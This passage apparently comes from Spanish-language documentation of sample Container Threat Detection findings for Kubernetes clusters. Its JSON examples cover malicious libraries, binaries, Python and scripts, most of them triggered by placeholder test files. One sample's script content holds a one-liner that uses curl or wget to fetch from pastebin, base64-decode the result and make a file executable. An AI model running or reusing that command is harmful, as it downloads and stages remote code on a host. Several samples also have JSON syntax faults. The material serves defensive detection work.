            "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
            "hashedSize": "68",
            "partiallyHashed": false
          }
        ],
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"/malicious_files/drop_mal_lib\"",
          "\"/tmp/added-malicious-library-299fd066380ce690-should-trigger\""
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.108.174.129:443\""
          },
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-added-malicious-library\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.108.174.129\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.108.174.129:443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.108.174.129\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
          }
        ],
        "pid": "8",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "added_malicious_library_loaded"
    },
    "detectionPriority": "CRITICAL",
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699911603",
            "nanos": 535268047
          }
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1105/"
      },
      "virustotalIndicatorQueryUri": [
        {
          "displayName": "VirusTotal IP Link",
          "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
        }
      ],
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:40:03.535268047Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}
  

Ejecución: Objeto binario integrado integrado y ejecutado

{
  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
    "category": "Execution: Built in Malicious Binary Executed",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-11-13T21:38:57.405Z",
    "database": {},
    "eventTime": "2023-11-13T21:38:57.250Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
                {
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
                }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "EXECUTION",
      "primaryTechniques": [
        "NATIVE_API"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/malicious_files/eicar_testing_file\"",
          "size": "68",
          "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
          "hashedSize": "68",
          "partiallyHashed": false
        },
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"/malicious_files/eicar_testing_file\"",
          "\"built-in-malicious-binary-818358caa95b6d42\""
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-built-in-malicious-binary\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
          }
        ],
        "pid": "7",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "built_in_malicious_binary_executed"
    },
    "detectionPriority": "CRITICAL",
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699911519",
            "nanos": 603253608
          }
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1106/"
      },
      "virustotalIndicatorQueryUri": [
        {
          "displayName": "VirusTotal IP Link",
          "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
        }
      ],
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.603253608Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}
  

Ejecución: Se ejecutó Python malicioso

{
  "finding": {
    "canonicalName": "projects/PROJECT_ID/sources/SOURCE_ID/locations/global/findings/FINDING_ID",
    "category": "Execution: Malicious Python executed",
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_IMAGE_URI",
        "imageId": "CONTAINER_IMAGE_ID",
        "createTime": "2024-06-17T18:50:13Z"
      }
    ],
    "createTime": "2024-06-17T18:50:15.454Z",
    "description": "A machine learning model using Natural Language Processing  techniques identified an executed python script as malicious.",
    "eventTime": "2024-06-17T18:50:15.217Z",
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "NAMESPACE",
          "containers": [
            {
              "name": "CONTAINER_NAME",
              "uri": "CONTAINER_IMAGE_URI",
              "imageId": "CONTAINER_IMAGE_ID",
              "createTime": "2024-06-17T18:50:13Z"
            }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "EXECUTION",
      "primaryTechniques": [
        "COMMAND_AND_SCRIPTING_INTERPRETER",
        "PYTHON"
      ],
      "additionalTactics": [
        "COMMAND_AND_CONTROL"
      ],
      "additionalTechniques": [
        "INGRESS_TOOL_TRANSFER"
      ]
    },
    "mute": "UNDEFINED",
    "muteUpdateTime": "1970-01-01T00:00:00Z",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "INTERPRETER",
          "size": "3492656",
          "sha256": "INTERPRETER_SHA_256",
          "hashedSize": "3492656",
          "partiallyHashed": false,
        },
        "script": {
          "path": "FILENAME",
          "size": "4191",
          "sha256": "SHA_256",
          "hashedSize": "4096",
          "partiallyHashed": true,
          "contents": "\"#!/usr/bin/env python\\n\\nimport uuid\\nimport subprocess\\nimport os\\nimport sys\\nsys.exit(0)…",
        },
        "args": [
          "INTERPRETER",
          "FILENAME"
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"HOSTNAME\"",
            "val": "\"CONTAINER_NAME\""
          },
        ],
        "pid": "7",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "severity": "CRITICAL",
    "state": "ACTIVE",
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "displayName": "CLUSTER_ID",
    "type": "google.container.Cluster",
    "cloudProvider": "GOOGLE_CLOUD_PLATFORM",
    "service": "container.googleapis.com",
    "location": "ZONE",
    "gcpMetadata": {
      "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",
      "projectDisplayName": "PROJECT_ID",
      "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",
      "parentDisplayName": "PROJECT_ID",
      "organization": "organizations/ORGANIZATION_ID"
    },
    "resourcePath": {
      "nodes": [
        {
          "nodeType": "GCP_PROJECT",
          "id": "projects/PROJECT_ID",
          "displayName": "PROJECT_ID"
        },
        {
          "nodeType": "GCP_ORGANIZATION",
          "id": "organizations/ORGANIZATION_ID"
        }
      ]
    },
    "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"
  },
  "sourceProperties": {
    "Process_Arguments": [
      "INTERPRETER",
      "FILENAME"
    ],
    "VM_Instance_Name": "INSTANCE_ID",
    "Process_Binary_Fullpath": {
        "primitiveDataType": "STRING"
      },
    "description": "A machine learning model using Natural Language Processing techniques identified an executed python script as malicious.",
    "Container_Creation_Timestamp": {
      "seconds": 1718650213,
      "nanos": 0
    },
    "Pod_Name": "CONTAINER_NAME",
    "Container_Image_Uri": "CONTAINER_IMAGE_URI",
    "Container_Image_Id": "CONTAINER_IMAGE_ID",
    "Parent_Pid": 1,
    "Container_Name": "CONTAINER_NAME",
    "Pid": 7,
    "Process_Creation_Timestamp": {
      "seconds": 1718650213,
      "nanos": 762524370
    },
    "Environment_Variables": [
    ],
    "Pod_Namespace": "default"
  }
}

  

Ejecución: ejecución de binario malicioso modificado

{
  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
    "category": "Execution: Modified Malicious Binary Executed",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-11-13T21:38:51.893Z",
    "database": {},
    "eventTime": "2023-11-13T21:38:51.525Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
                {
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
                }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "COMMAND_AND_CONTROL",
      "primaryTechniques": [
        "INGRESS_TOOL_TRANSFER"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/malicious_files/file_to_be_modified\"",
          "size": "68",
          "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
          "hashedSize": "68",
          "partiallyHashed": false
        },
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"/malicious_files/file_to_be_modified\"",
          "\"modified-malicious-binary-da2a7b72e6008bc3\""
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-modified-malicious-binary\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
          }
        ],
        "pid": "8",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "modified_malicious_binary_executed"
    },
    "detectionPriority": "CRITICAL",
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699905066",
            "nanos": 618571329
          }
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1105/"
      },
      "virustotalIndicatorQueryUri": [
        {
          "displayName": "VirusTotal IP Link",
          "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
        }
      ],
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.084524438Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}
  

Ejecución: Se cargó la biblioteca maliciosa modificada

{
  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
    "category": "Execution: Modified Malicious Library Loaded",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-11-13T21:38:55.271Z",
    "database": {},
    "eventTime": "2023-11-13T21:38:55.133Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
                {
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
                }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "COMMAND_AND_CONTROL",
      "primaryTechniques": [
        "INGRESS_TOOL_TRANSFER"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/malicious_files/drop_mal_lib\"",
          "size": "5005064",
          "sha256": "fe2e70de9f77047d3bf5debe3135811300c9c69b937b7fd3e2ca8451a942d5fb",
          "hashedSize": "5005064",
          "partiallyHashed": false
        },
        "libraries": [
          {
            "path": "\"/malicious_files/file_to_be_modified\"",
            "size": "68",
            "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
            "hashedSize": "68",
            "partiallyHashed": false
          }
        ],
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"/malicious_files/drop_mal_lib\"",
          "\"/malicious_files/file_to_be_modified\"",
          "\"/tmp/modified-malicious-library-430bbedd7049b0d1\""
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-modified-malicious-library\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
          }
        ],
        "pid": "8",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "modified_malicious_library_loaded"
    },
    "detectionPriority": "CRITICAL",
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699911519",
            "nanos": 124151422
          }
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1105/"
      },
      "virustotalIndicatorQueryUri": [
        {
          "displayName": "VirusTotal IP Link",
          "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
        }
      ],
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.124151422Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}
  

Secuencia de comandos maliciosa ejecutada

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "state": "ACTIVE",
    "category": "Malicious Script Executed",
    "sourceProperties": {
      "VM_Instance_Name": "INSTANCE_ID",
      "Script_Filename": "FILENAME",
      "Script_SHA256": "SHA_256",
      "Container_Image_Id": "CONTAINER_IMAGE_ID",
      "Container_Name": "CONTAINER_NAME",
      "Parent_Pid": 1.0,
      "Container_Image_Uri": "CONTAINER_IMAGE_URI",
      "Process_Creation_Timestamp": {
        "seconds": 1.617989997E9,
        "nanos": 1.17396995E8
      },
      "Pid": 53.0,
      "Pod_Namespace": "default",
      "Process_Binary_Fullpath": "INTERPRETER",
      "Process_Arguments": ["INTERPRETER", "FILENAME"],
      "Pod_Name": "POD_NAME",
      "description": "A machine learning model using Natural Language Processing techniques identified an executed bash script as malicious.",
      "Script_Content": "(curl -fsSL https://pastebin.com||wget -q -O - https://pastebin.com)| tac | base64 -di | exit 0 | > x ; chmod 777 x ;",
      "Environment_Variables": ["KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT",
      "KUBERNETES_SERVICE_PORT\u003d443", "HOSTNAME\u003dreconnect-
      test-4af235e12be6f9d9", "HOME\u003d/root",
      "KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
      "PATH\u003d/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
      "KUBERNETES_PORT_443_TCP_PORT\u003d443",
      "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp",
      "DEBIAN_FRONTEND\u003dnoninteractive",
      "KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT",
      "KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
      "KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS", "PWD\u003d/"],
      "Container_Creation_Timestamp": {
        "seconds": 1.617989918E9,
        "nanos": 0.0
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-04-09T17:39:57.527Z",
    "createTime": "2021-04-09T17:39:57.625Z",
    "propertyDataTypes": {
      "Container_Image_Id": {
        "primitiveDataType": "STRING"
      },
      "Pod_Namespace": {
        "primitiveDataType": "STRING"
      },
      "Container_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Environment_Variables": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "description": {
        "primitiveDataType": "STRING"
      },
      "Pid": {
        "primitiveDataType": "NUMBER"
      },
      "Process_Arguments": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Container_Image_Uri": {
        "primitiveDataType": "STRING"
      },
      "Pod_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Parent_Pid": {
        "primitiveDataType": "NUMBER"
      },
      "VM_Instance_Name": {
        "primitiveDataType": "STRING"
      },
      "Script_Content": {
        "primitiveDataType": "STRING"
      },
      "Script_Filename": {
        "primitiveDataType": "STRING"
      },
      "Container_Name": {
        "primitiveDataType": "STRING"
      },
      "Script_SHA256": {
        "primitiveDataType": "STRING"
      },
      "Process_Binary_Fullpath": {
        "primitiveDataType": "STRING"
      }
    },
    "severity": "CRITICAL",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parentDisplayName": "PROJECT_ID",
    "type": "google.container.Cluster"
  }
}
  

Se observó la URL maliciosa

    {
      "findings": {
        "access": {},
        "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
        "category": "Malicious URL Observed",
        "containers": [
          {
            "name": "CONTAINER_NAME",
            "uri": "CONTAINER_URI",
            "imageId": "CONTAINER_IMAGE_ID"
          }
        ],
        "createTime": "2022-09-14T21:35:46.209Z",
        "database": {},
        "description": "A malicious URL is observed in the container workload.",
        "eventTime": "2022-09-14T21:35:45.992Z",
        "exfiltration": {},
        "findingClass": "THREAT",
        "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
        "indicator": {
          "uris": [
